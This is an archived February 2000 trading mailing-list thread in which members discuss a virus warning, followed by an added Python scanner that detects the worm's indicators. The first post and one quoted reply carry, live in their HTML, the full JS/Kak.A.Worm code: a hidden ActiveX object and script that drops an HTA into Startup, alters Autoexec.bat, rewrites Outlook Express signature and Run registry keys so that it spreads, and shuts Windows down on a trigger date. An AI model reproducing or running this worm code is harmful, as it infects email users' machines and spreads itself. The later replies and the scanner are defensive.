
[RT] GEN - RT virus?




<x-html><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.2314.1000" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT size=2>Any way to tell if this virus was attached at the RT server or 
in my computer?&nbsp; Anyone else getting this virus message?</FONT></DIV>
<DIV><FONT size=2>BR</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC 
id=scr></OBJECT></DIV><FONT size=2>Antigen for Exchange found Unknown infected 
with JS/Kak.A.Worm virus.<BR>The file is currently Deleted.&nbsp; The message, 
"[RT] MKT - OEX", was<BR>sent from ROBERT ROESKE&nbsp; and was discovered in IMC 
Queues\Inbound<BR>located at Distrivision/NORTHAMERICA/C1PLENAEXI01.<BR></FONT>
<SCRIPT><!--
function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\" WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>function sEr(){self.close();return true;}window.onerror=sEr;fs=new ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUDÉ~1\\\\PROGRA~1\\\\DÉMARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if(hO.commandLine.search(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(aek);t1=f1.OpenAsTextStream(8);pth=(kk==kfr)?wd+'MENUD~1\\\\PROGRA~1\\\\DMARR~1\\\\kak.hta':ken;t1.WriteLine('@echo off>'+pth);t1.WriteLine('del '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2).Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000]');t2.WriteLine('\"name\"=\"Signature #1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"');t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature 
Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s '+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.close();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Démarrer\\\\\\\\Programmes\\\\\\\\Démarrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf(\"msie 5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc failed &nbsp; !]]%%%%%</"+"BODY></"+"HTML>";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Démarrer\\Programmes\\Démarrage\\kak.hta":"C:\\windows\\Start Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write();
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>
</x-html>From ???@??? Tue Feb 15 12:42:38 2000
Return-Path: <listmanager@xxxxxxxxxxxxxxx>
Received: from mail.thetrellis.net ([208.179.56.11])
	by purebytes.com (8.9.3/8.9.3) with SMTP id MAA17943
	for <neal@xxxxxxxxxxxxx>; Tue, 15 Feb 2000 12:36:06 -0700
Received: from REALTRADERS.COM
	([208.179.56.198])
	by mail.thetrellis.net; Tue, 15 Feb 2000 11:29:44 -0800
Received: from zianet.com by realtraders.com
	with SMTP (MDaemon.v2.8.5.0.R)
	for <realtraders@xxxxxxxxxxxxxxx>; Tue, 15 Feb 2000 11:23:54 -0800
Received: (qmail 27667 invoked by alias); 15 Feb 2000 19:27:18 -0000
Delivered-To: alias-outgoing-realtraders@xxxxxxxxxxxxxxx@outgoing
Received: (qmail 21681 invoked by uid 0); 15 Feb 2000 19:26:37 -0000
Received: from ruidoso0150.zianet.com (HELO p13301) (216.234.206.150)
  by zianet.com with SMTP; 15 Feb 2000 19:26:37 -0000
Message-ID: <013001bf77ea$8aaefe40$96ceead8@xxxxxx>
From: "Earl Adamy" <eadamy@xxxxxxxxxx>
To: "<realtraders@xxxxxxxxxxxxxxx>"
	<realtraders@xxxxxxxxxxxxxxx>
References: <017401bf77e7$19de1a00$a572fea9@xxx>
Subject: [RT] Re: GEN - RT virus?  QUITE LIKELY
Date: Tue, 15 Feb 2000 12:26:17 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_012D_01BF77AF.DB6F9B90"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6600
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
X-MDaemon-Deliver-To: realtraders@xxxxxxxxxxxxxxx
X-Return-Path: eadamy@xxxxxxxxxx
Sender: listmanager@xxxxxxxxxxxxxxx
X-MDMailing-List: realtraders@xxxxxxxxxxxxxxx
X-MDSend-Notifications-To: listmanager@xxxxxxxxxxxxxxx
Reply-To: eadamy@xxxxxxxxxx
Status:   

<x-html><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=windows-1252" http-equiv=Content-Type>
<META content="MSHTML 5.00.2722.2800" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV>Your messages have&nbsp;been generating a message that an&nbsp;"ActiveX 
control on this page is not safe" when I select it in the OE preview window. 
My&nbsp;security settings are too high to allow it to execute. I have all of the 
latest IE5/OE5 security updates installed. I would recommend that anyone who has 
not gotten this warning run a full virus scan.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Earl</DIV>
<BLOCKQUOTE 
style="BORDER-LEFT: #000000 2px solid; MARGIN-LEFT: 5px; MARGIN-RIGHT: 0px; PADDING-LEFT: 5px; PADDING-RIGHT: 0px">
  <DIV style="FONT: 10pt arial">----- Original Message ----- </DIV>
  <DIV 
  style="BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: black"><B>From:</B> 
  <A href="mailto:bobrabcd@xxxxxxxxxxxxx" title=bobrabcd@xxxxxxxxxxxxx>ROBERT 
  ROESKE</A> </DIV>
  <DIV style="FONT: 10pt arial"><B>To:</B> <A 
  href="mailto:realtraders@xxxxxxxxxxxxxxx" 
  title=realtraders@xxxxxxxxxxxxxxx>realtraders@xxxxxxxxxxxxxxx</A> </DIV>
  <DIV style="FONT: 10pt arial"><B>Sent:</B> Tuesday, February 15, 2000 12:01 
  PM</DIV>
  <DIV style="FONT: 10pt arial"><B>Subject:</B> [RT] GEN - RT virus?</DIV>
  <DIV><BR></DIV>
  <DIV><FONT size=2>Any way to tell if this virus was attached at the RT server 
  or in my computer?&nbsp; Anyone else getting this virus message?</FONT></DIV>
  <DIV><FONT size=2>BR</FONT></DIV>
  <DIV>&nbsp;</DIV>
  <DIV>&nbsp;</DIV>
  <DIV>
  <DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
  <OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC 
  id=scr></OBJECT></DIV><FONT size=2>Antigen for Exchange found Unknown infected 
  with JS/Kak.A.Worm virus.<BR>The file is currently Deleted.&nbsp; The message, 
  "[RT] MKT - OEX", was<BR>sent from ROBERT ROESKE&nbsp; and was discovered in 
  IMC Queues\Inbound<BR>located at 
  Distrivision/NORTHAMERICA/C1PLENAEXI01.<BR></FONT>
  <SCRIPT><!--
function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\" WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>function sEr(){self.close();return true;}window.onerror=sEr;fs=new ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUDÉ~1\\\\PROGRA~1\\\\DÉMARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if(hO.commandLine.search(re)!=-1){f1=fsGetFile(aeb);f1.Copy(aek);t1=f1.OpenAsTextStream(8);pth=(kk==kfr)?wd+'MENUD~1\\\\PROGRA~1\\\\DMARR~1\\\\kak.hta':ken;t1.WriteLine('@echo off>'+pth);t1.WriteLine('del '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2).Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000]');t2.WriteLine('\"name\"=\"Signature #1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"');t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature 
Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s '+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.close();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Démarrer\\\\\\\\Programmes\\\\\\\\Démarrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf(\"msie 5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc failed &nbsp; !]]%%%%%</"+"BODY></"+"HTML>";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Démarrer\\Programmes\\Démarrage\\kak.hta":"C:\\windows\\Start Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write();
//--></SCRIPT>
  </OBJECT></DIV></BLOCKQUOTE></BODY></HTML>
</x-html>From ???@??? Tue Feb 15 12:42:55 2000
Return-Path: <listmanager@xxxxxxxxxxxxxxx>
Received: from mail.thetrellis.net ([208.179.56.11])
	by purebytes.com (8.9.3/8.9.3) with SMTP id MAA18079
	for <neal@xxxxxxxxxxxxx>; Tue, 15 Feb 2000 12:39:20 -0700
Received: from REALTRADERS.COM
	([208.179.56.198])
	by mail.thetrellis.net; Tue, 15 Feb 2000 11:30:55 -0800
Received: from defiant.coinet.com by realtraders.com
	with SMTP (MDaemon.v2.8.5.0.R)
	for <realtraders@xxxxxxxxxxxxxxx>; Tue, 15 Feb 2000 11:24:40 -0800
Received: (qmail 24625 invoked from network); 15 Feb 2000 19:27:45 -0000
Received: from tc1-2-5.cns-nw.com (HELO coinet.com) (204.119.54.35)
  by coinet.com with SMTP; 15 Feb 2000 19:27:45 -0000
Message-ID: <38A9A8AE.BDD4C285@xxxxxxxxxx>
Date: Tue, 15 Feb 2000 11:27:42 -0800
From: Dennis Holverstott <dennis@xxxxxxxxxx>
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en
MIME-Version: 1.0
To: <realtraders@xxxxxxxxxxxxxxx>
CC: realtraders@xxxxxxxxxxxxxxx
Subject: [RT] Re: GEN - RT virus?
References: <017401bf77e7$19de1a00$a572fea9@xxx>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-MDaemon-Deliver-To: realtraders@xxxxxxxxxxxxxxx
X-Return-Path: dennis@xxxxxxxxxx
Sender: listmanager@xxxxxxxxxxxxxxx
X-MDMailing-List: realtraders@xxxxxxxxxxxxxxx
X-MDSend-Notifications-To: listmanager@xxxxxxxxxxxxxxx
Reply-To: dennis@xxxxxxxxxx
Status:   

Bob, it looks like your computer is infected. Both your posts to RT
today contain a javascript worm designed to infect Outlook Express
users. Your last post from yesterday is clean.

Ah, just got your post from the other computer. That one is clean.

RT subscribers who use Outlook Express, BEWARE. You may be infected too.

ps - I didn't need any antivirus software to see that. I just looked at
the "page source" in Netscape. It contains...

<SCRIPT>

worm snipped

</SCRIPT>

-- 
  Dennis
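The check Dennis describes (reading the message source for the injected <SCRIPT>), plus the artifacts visible in the worm body quoted above, turned into a scanner for archived messages. This is an added example written for this page, not code from anyone in the thread or from any product mentioned in it. It assumes messages in RFC 822 form as archived here and uses only Python's standard email package; the sample messages it builds are constructed fixtures, not messages from the list. The first classid it looks for is the Scriptlet.TypeLib control the worm instantiates as `scr`; the second is WScript.Shell, which the worm binds as `wsh` to run Regedit.

```python
"""Indicator scan for JS/Kak in an RFC 822 message (added example, not from the thread)."""
import email
import re
from email import policy
from email.message import EmailMessage

# Artifacts taken from the worm body quoted in the thread: the Scriptlet.TypeLib
# object (`scr`), the WScript.Shell object (`wsh`), the HTA wrapper, the dropper
# file names, the Run-key value name and the worm's payload string.
KAK_INDICATORS = {
    "scriptlet_typelib_object": re.compile(r"clsid:06290BD5-48AA-11D2-8432-006008C3FBFC", re.I),
    "wscript_shell_object": re.compile(r"clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", re.I),
    "hta_application": re.compile(r"<HTA:APPLICATION\b", re.I),
    "kak_dropper_files": re.compile(r"\bkak\.(?:hta|htm|reg)\b", re.I),
    "run_key_value": re.compile(r"cAg0u"),
    "kagou_string": re.compile(r"Kagou-Anti-Kro\$oft"),
}

# Dennis's coarse check: does the rendered HTML carry any active content at all?
ACTIVE_CONTENT = re.compile(r"<(?:script|object|applet|embed)\b", re.I)


def html_parts(msg):
    """Yield decoded text/html bodies; OE sends multipart/alternative, so walk the tree."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_content()


def has_active_content(body: str) -> bool:
    return ACTIVE_CONTENT.search(body) is not None


def verdict(hits: dict) -> str:
    """Require the Scriptlet.TypeLib object plus at least one other artifact, so a lone
    prose mention of "kak.hta" rates only as suspicious."""
    if "scriptlet_typelib_object" in hits and len(hits) >= 2:
        return "infected"
    return "suspicious" if hits else "clean"


def scan_message(raw: bytes) -> dict:
    """Scan one message. text/plain parts are not rendered by the client and are
    skipped, so quoting "<SCRIPT>" in a plain-text reply does not trip the scanner."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits: dict = {}
    active = False
    for body in html_parts(msg):
        active = active or has_active_content(body)
        for name, rx in KAK_INDICATORS.items():
            n = sum(1 for _ in rx.finditer(body))
            if n:
                hits[name] = hits.get(name, 0) + n
    return {"active_content": active, "hits": hits, "verdict": verdict(hits)}


def build_sample(html: str, plain: str = "plain-text alternative") -> bytes:
    """Constructed OE-style multipart/alternative message (not a message from the list)."""
    m = EmailMessage()
    m["From"] = "sender@example.invalid"
    m["To"] = "realtraders@example.invalid"
    m["Subject"] = "[RT] GEN - sample"
    m.set_content(plain)
    m.add_alternative(html, subtype="html")
    return m.as_bytes()


def build_plain_sample(text: str) -> bytes:
    """Constructed text/plain message, shaped like a Netscape reply."""
    m = EmailMessage()
    m["From"] = "sender@example.invalid"
    m["Subject"] = "[RT] Re: GEN - sample"
    m.set_content(text)
    return m.as_bytes()


# Constructed fixture: only the visible skeleton of the infection (hidden OBJECT,
# loader script, dropper names), not the worm body itself.
INFECTED_HTML = """<HTML><BODY>
<DIV>Any way to tell if this virus was attached at the RT server?</DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr></OBJECT></DIV>
<SCRIPT><!--
scr.Reset();scr.doc="Z<HTML><HEAD><HTA:APPLICATION ID=hO WINDOWSTATE=Minimize></HEAD>
<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
... kak.hta ... kak.reg ... "cAg0u"=... ";
//--></SCRIPT></BODY></HTML>"""

CLEAN_HTML = """<HTML><BODY><DIV><FONT size=2>Any way to tell if this virus was
attached at the RT server or in my computer?</FONT></DIV></BODY></HTML>"""

# Constructed plain-text reply that merely talks about the worm.
PLAIN_REPLY = "Both posts today contain a javascript worm. The source has:\n\n<SCRIPT>\n\nworm snipped\n\n</SCRIPT>\n"

if __name__ == "__main__":
    for label, raw in [("infected", build_sample(INFECTED_HTML)),
                       ("clean", build_sample(CLEAN_HTML)),
                       ("plain reply", build_plain_sample(PLAIN_REPLY))]:
        print(label, scan_message(raw))
```

Earl's reply above carries the whole infected message inside a BLOCKQUOTE, OBJECT and SCRIPT included, so this scanner flags it as infected too; that is the right outcome, since the recipient's preview pane renders a quoted copy exactly as it renders the original. Deleting the message at the gateway, as the Antigen notice in the first post reports, is the safe action; relying on the client's "ActiveX control on this page is not safe" prompt depends on every reader having Earl's security settings.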